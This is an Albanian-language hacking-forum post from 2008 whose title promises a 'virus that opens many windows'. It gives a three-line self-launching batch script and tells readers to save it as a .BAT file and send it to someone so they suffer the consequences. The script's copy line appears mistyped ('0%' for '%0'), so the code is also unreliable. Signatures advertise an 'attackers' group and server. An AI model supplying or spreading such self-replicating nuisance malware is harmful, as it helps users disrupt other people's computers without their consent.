ForumPytėsoriKėrkoLista AnėtarėveGrupet e AnėtarėveRegjistrohuidentifikimi

Share | 
 

 Me kriju nje Virus qe te qel dritare shum!!!

Shko poshtė 
AutoriMesazh
shqiprim
Admin
Admin
avatar

Numri i postimeve : 320
Join date : 02/05/2008

MesazhTitulli: Me kriju nje Virus qe te qel dritare shum!!!   Sat May 03, 2008 1:26 pm

E Hapim Notepad edhe e qesim kete :

Cito:
@echo off
copy 0% ms32.bat
start ms32.bat

Edhe e rujm emri.BAT edhe nese doni e ekzekutoni file-n

Pastaj ja qoni ndokujt dhe aj perballet me pasojat e shum faqeve te hapura
,,,,,,,,,FuaT
Email:_fuat@live.com
Web:www.FuaT.c.la
Server:connect attackers.podzone.org
Group: aTTacKers
FuaT
Email:erion_k@madrid.com
Web:www.ErioN.c.la
Server:connect attackers.podzone.org
Group: aTTacKers
Mbrapsht nė krye Shko poshtė
Shiko profilin e anėtarit http://attackers-team.albanianforum.net
 
Me kriju nje Virus qe te qel dritare shum!!!
Mbrapsht nė krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi
 :: Hacker Boxi :: Tutorials-
Kėrce tek: